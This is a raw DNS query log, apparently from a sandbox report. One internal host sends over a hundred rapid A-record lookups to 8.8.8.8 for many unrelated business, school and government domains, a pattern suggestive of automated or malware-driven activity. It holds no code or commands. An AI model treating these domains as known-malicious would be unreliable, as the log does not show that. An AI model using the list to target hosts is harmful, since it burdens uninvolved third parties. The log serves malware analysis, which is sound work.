                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.914202929 CET192.168.2.58.8.8.80x88c9Standard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.914202929 CET192.168.2.58.8.8.80x6441Standard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.916127920 CET192.168.2.58.8.8.80x5245Standard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.918325901 CET192.168.2.58.8.8.80xece2Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.923856020 CET192.168.2.58.8.8.80x868Standard query (0)popbook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.926234961 CET192.168.2.58.8.8.80x9f92Standard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.927265882 CET192.168.2.58.8.8.80x1e0fStandard query (0)anduran.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.928086996 CET192.168.2.58.8.8.80x470bStandard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.928855896 CET192.168.2.58.8.8.80x3af0Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.929821968 CET192.168.2.58.8.8.80xa2a2Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.932347059 CET192.168.2.58.8.8.80x7c5fStandard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.933690071 CET192.168.2.58.8.8.80x3e65Standard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.934946060 CET192.168.2.58.8.8.80x3de9Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.934946060 CET192.168.2.58.8.8.80x9bb3Standard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.938205957 CET192.168.2.58.8.8.80xf037Standard query (0)sidepath.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.940082073 CET192.168.2.58.8.8.80xee97Standard query (0)floopis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.942151070 CET192.168.2.58.8.8.80x6a2fStandard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.948165894 CET192.168.2.58.8.8.80xab1Standard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.948779106 CET192.168.2.58.8.8.80x7a77Standard query (0)shenhgts.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.951762915 CET192.168.2.58.8.8.80x15cdStandard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.955415010 CET192.168.2.58.8.8.80x769eStandard query (0)603888.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.978035927 CET192.168.2.58.8.8.80x42ceStandard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.986767054 CET192.168.2.58.8.8.80xf802Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.013051987 CET192.168.2.58.8.8.80xc9d4Standard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.016689062 CET192.168.2.58.8.8.80x2bdeStandard query (0)bidroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.017985106 CET192.168.2.58.8.8.80x4ff0Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.026716948 CET192.168.2.58.8.8.80x8dbfStandard query (0)touchfam.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.027831078 CET192.168.2.58.8.8.80x8382Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.037944078 CET192.168.2.58.8.8.80xe1cfStandard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.041994095 CET192.168.2.58.8.8.80x9c8cStandard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.044667006 CET192.168.2.58.8.8.80x8b6dStandard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.047122002 CET192.168.2.58.8.8.80x220cStandard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.047461987 CET192.168.2.58.8.8.80x3a2fStandard query (0)atbauk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.050923109 CET192.168.2.58.8.8.80xea9bStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.056227922 CET192.168.2.58.8.8.80xe1c8Standard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.069330931 CET192.168.2.58.8.8.80x6eb2Standard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.071309090 CET192.168.2.58.8.8.80xbad8Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.071743965 CET192.168.2.58.8.8.80x29a8Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.073817968 CET192.168.2.58.8.8.80x3820Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.081494093 CET192.168.2.58.8.8.80x639bStandard query (0)aluminox.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.087701082 CET192.168.2.58.8.8.80xa077Standard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.098370075 CET192.168.2.58.8.8.80x2e76Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.098737955 CET192.168.2.58.8.8.80x6233Standard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.099411011 CET192.168.2.58.8.8.80xcb0aStandard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.101957083 CET192.168.2.58.8.8.80x9e11Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.105593920 CET192.168.2.58.8.8.80xbd33Standard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.106812954 CET192.168.2.58.8.8.80x8b91Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.120270967 CET192.168.2.58.8.8.80x837aStandard query (0)mackusick.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.120728970 CET192.168.2.58.8.8.80xaf30Standard query (0)adeesa.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.135005951 CET192.168.2.58.8.8.80xa6c1Standard query (0)avse.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.159696102 CET192.168.2.58.8.8.80x4dceStandard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.167089939 CET192.168.2.58.8.8.80xb023Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.182260036 CET192.168.2.58.8.8.80x97e7Standard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.185806036 CET192.168.2.58.8.8.80x2f2dStandard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.192183971 CET192.168.2.58.8.8.80xafc1Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.202985048 CET192.168.2.58.8.8.80xf7e1Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.209796906 CET192.168.2.58.8.8.80x506dStandard query (0)sigtoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.216109991 CET192.168.2.58.8.8.80xbb82Standard query (0)techtrans.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.224462986 CET192.168.2.58.8.8.80x14e4Standard query (0)webways.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.229888916 CET192.168.2.58.8.8.80x3d6Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.249727964 CET192.168.2.58.8.8.80xfc30Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.250930071 CET192.168.2.58.8.8.80x4596Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.252616882 CET192.168.2.58.8.8.80x954aStandard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.255961895 CET192.168.2.58.8.8.80x8897Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.260788918 CET192.168.2.58.8.8.80xd3aaStandard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.267139912 CET192.168.2.58.8.8.80x4dc7Standard query (0)aiolos-sa.grA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.273154974 CET192.168.2.58.8.8.80xca71Standard query (0)usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.287349939 CET192.168.2.58.8.8.80x45eeStandard query (0)tbvlugus.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.312335014 CET192.168.2.58.8.8.80x8cd6Standard query (0)shenhgts.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.316471100 CET192.168.2.58.8.8.80xa9b8Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.317120075 CET192.168.2.58.8.8.80x9bStandard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.319825888 CET192.168.2.58.8.8.80x6860Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.323159933 CET192.168.2.58.8.8.80x9c27Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.333427906 CET192.168.2.58.8.8.80x79aaStandard query (0)xsui.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.336477041 CET192.168.2.58.8.8.80x77b2Standard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.338973999 CET192.168.2.58.8.8.80x7688Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.346738100 CET192.168.2.58.8.8.80xe2fStandard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.347206116 CET192.168.2.58.8.8.80x9746Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.350665092 CET192.168.2.58.8.8.80x7420Standard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.353077888 CET192.168.2.58.8.8.80x3b81Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.353334904 CET192.168.2.58.8.8.80xc984Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.355458975 CET192.168.2.58.8.8.80xc21fStandard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.357654095 CET192.168.2.58.8.8.80x9e2Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.365046978 CET192.168.2.58.8.8.80xb18aStandard query (0)dbnet.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.376223087 CET192.168.2.58.8.8.80x5736Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.389118910 CET192.168.2.58.8.8.80x9761Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.407872915 CET192.168.2.58.8.8.80x6028Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.409598112 CET192.168.2.58.8.8.80xdab1Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.413794994 CET192.168.2.58.8.8.80xfe09Standard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.416843891 CET192.168.2.58.8.8.80x33cStandard query (0)enguita.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.419262886 CET192.168.2.58.8.8.80x4557Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.420295954 CET192.168.2.58.8.8.80xadeeStandard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.423223019 CET192.168.2.58.8.8.80xd95Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.426182985 CET192.168.2.58.8.8.80xfe8cStandard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.429609060 CET192.168.2.58.8.8.80x7120Standard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.430596113 CET192.168.2.58.8.8.80xa390Standard query (0)insia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.459402084 CET192.168.2.58.8.8.80xe6b7Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.484592915 CET192.168.2.58.8.8.80x2437Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.488373995 CET192.168.2.58.8.8.80x83bfStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.508554935 CET192.168.2.58.8.8.80x66a5Standard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.511784077 CET192.168.2.58.8.8.80xed30Standard query (0)akdeniz.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.513123989 CET192.168.2.58.8.8.80x6c77Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.515264988 CET192.168.2.58.8.8.80xacd9Standard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.518863916 CET192.168.2.58.8.8.80x4242Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.523212910 CET192.168.2.58.8.8.80xd080Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.526781082 CET192.168.2.58.8.8.80xb2a4Standard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.528320074 CET192.168.2.58.8.8.80x3b67Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.529227018 CET192.168.2.58.8.8.80xfc31Standard query (0)pleszew.policja.gov.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.535679102 CET192.168.2.58.8.8.80x3427Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.537435055 CET192.168.2.58.8.8.80x40f4Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.551975965 CET192.168.2.58.8.8.80xd54fStandard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.556998968 CET192.168.2.58.8.8.80xe31cStandard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.557687044 CET192.168.2.58.8.8.80x1164Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.561194897 CET192.168.2.58.8.8.80x3061Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.573370934 CET192.168.2.58.8.8.80x3ee6Standard query (0)cnti.krsn.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.576159954 CET192.168.2.58.8.8.80x233cStandard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.585206985 CET192.168.2.58.8.8.80x5a52Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.595716000 CET192.168.2.58.8.8.80xdd14Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.601874113 CET192.168.2.58.8.8.80xd553Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.606686115 CET192.168.2.58.8.8.80x21b8Standard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.616224051 CET192.168.2.58.8.8.80xdb52Standard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.616574049 CET192.168.2.58.8.8.80xfb75Standard query (0)sinwal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.626492023 CET192.168.2.58.8.8.80xe393Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.645786047 CET192.168.2.58.8.8.80xa385Standard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.652693033 CET192.168.2.58.8.8.80xa509Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.661180973 CET192.168.2.58.8.8.80xb9edStandard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.663921118 CET192.168.2.58.8.8.80x4ce9Standard query (0)bossinst.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.713480949 CET192.168.2.58.8.8.80x456eStandard query (0)impexnc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.728961945 CET192.168.2.58.8.8.80xad67Standard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.735306978 CET192.168.2.58.8.8.80xa059Standard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.748014927 CET192.168.2.58.8.8.80xd684Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.753185034 CET192.168.2.58.8.8.80x6299Standard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.765031099 CET192.168.2.58.8.8.80x6f8dStandard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.765031099 CET192.168.2.58.8.8.80x442eStandard query (0)fifa-ews.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.771819115 CET192.168.2.58.8.8.80xbb62Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.797139883 CET192.168.2.58.8.8.80xffefStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.842582941 CET192.168.2.58.8.8.80xb386Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.859250069 CET192.168.2.58.8.8.80xa0aStandard query (0)clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.861325979 CET192.168.2.58.8.8.80x6ac4Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.863229990 CET192.168.2.58.8.8.80x9cfStandard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.866060972 CET192.168.2.58.8.8.80x1464Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.932759047 CET192.168.2.58.8.8.80xd57fStandard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.932813883 CET192.168.2.58.8.8.80xd39aStandard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.948426962 CET192.168.2.58.8.8.80xc6eaStandard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.950906992 CET192.168.2.58.8.8.80x976fStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.969075918 CET192.168.2.58.8.8.80x6892Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.969075918 CET192.168.2.58.8.8.80x4479Standard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.971106052 CET192.168.2.58.8.8.80x139dStandard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.983465910 CET192.168.2.58.8.8.80x60baStandard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.985582113 CET192.168.2.58.8.8.80xd658Standard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.985582113 CET192.168.2.58.8.8.80x21efStandard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.005012989 CET192.168.2.58.8.8.80x92bdStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.025331974 CET192.168.2.58.8.8.80x9450Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.027806997 CET192.168.2.58.8.8.80x9c67Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.033045053 CET192.168.2.58.8.8.80xd361Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.035917044 CET192.168.2.58.8.8.80xd20dStandard query (0)nts-web.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.037539005 CET192.168.2.58.8.8.80x803aStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.042561054 CET192.168.2.58.8.8.80x11dcStandard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.042562008 CET192.168.2.58.8.8.80xaac1Standard query (0)popbook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.043411970 CET192.168.2.58.8.8.80x5916Standard query (0)coxkitchensandbaths.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.052644968 CET192.168.2.58.8.8.80x2dc9Standard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.055238962 CET192.168.2.58.8.8.80xd2b2Standard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.065315962 CET192.168.2.58.8.8.80xa783Standard query (0)usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.073137999 CET192.168.2.58.8.8.80x8e98Standard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.073496103 CET192.168.2.58.8.8.80x5d4dStandard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.082729101 CET192.168.2.58.8.8.80xce3bStandard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.086240053 CET192.168.2.58.8.8.80xda98Standard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.106873035 CET192.168.2.58.8.8.80x7c63Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.116136074 CET192.168.2.58.8.8.80x8e9cStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.128098011 CET192.168.2.58.8.8.80xd1bbStandard query (0)listel.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.133301973 CET192.168.2.58.8.8.80x749Standard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.136823893 CET192.168.2.58.8.8.80xdd21Standard query (0)metaforacom.comA (IP address)IN (0x0001)false
